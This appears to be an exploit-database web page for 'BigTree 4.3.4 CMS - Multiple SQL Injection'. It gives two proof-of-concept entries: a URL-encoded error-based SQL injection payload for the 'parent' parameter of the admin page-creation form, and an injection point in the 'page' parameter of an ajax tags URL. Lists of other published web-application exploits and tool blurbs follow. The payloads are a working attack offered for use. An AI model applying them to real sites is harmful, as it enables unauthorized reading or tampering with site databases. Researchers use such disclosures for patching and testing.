Search for hundreds of thousands of exploits

"BigTree 4.3.4 CMS - Multiple SQL Injection"

Author

Exploit author

"Mehmet EMIROGLU"

Platform

Exploit platform

php

Release date

Exploit published date

2019-03-28

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
===========================================================================================
# Exploit Title: BigTree CMS - 'parent' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
  you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
  It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : parent
# Attack Pattern :
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
# POST Method :
http://localhost/BigTree-CMS/site/index.php/admin/pages/create/
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: BigTree CMS - 'page' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
  you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
  It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : page
# Attack Pattern : %2527
# GET Method :
http://localhost/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page=[SQL
Inject Here]&sort=
===========================================================================================
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-26"OpenEMR 5.0.1 - Remote Code Execution"webappsphp"Musyoka Ian"
Release DateTitleTypePlatformAuthor
2019-07-08"Karenderia Multiple Restaurant System 5.3 - SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-07-05"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion"webappsphp"Mehmet EMIROGLU"
2019-07-01"WorkSuite PRM 2.4 - 'password' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-07-01"Varient 1.6.1 - SQL Injection"webappsmultiple"Mehmet EMIROGLU"
2019-07-01"CiuisCRM 1.6 - 'eventType' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-16"DeepSound 1.0.4 - SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-14"Sales ERP 8.1 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-14"PasteShr 1.6 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-28"Job Portal 3.1 - 'job_submit' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-28"BigTree 4.3.4 CMS - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-20"202CMS v10beta - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-19"eNdonesia Portal 8.7 - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-18"TheCarProject v2 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-15"Laundry CMS - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-15"ICE HRM 23.0 - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-07"Kados R10 GreenBee - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-05"OpenDocMan 1.3.4 - 'search.php where' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-20"HotelDruid 2.3 - Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"qdPM 9.1 - 'search[keywords]' Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"qdPM 9.1 - 'type' Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload"webappsphp"Mehmet EMIROGLU"
2019-02-15"qdPM 9.1 - 'search_by_extrafields[]' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-13"PilusCart 1.4.1 - 'send' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-13"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-11"Webiness Inventory 2.3 - 'email' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'products_id' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'currency' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-04"SuiteCRM 7.10.7 - 'parentTab' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-04"SuiteCRM 7.10.7 - 'record' SQL Injection"webappsphp"Mehmet EMIROGLU"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46623/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.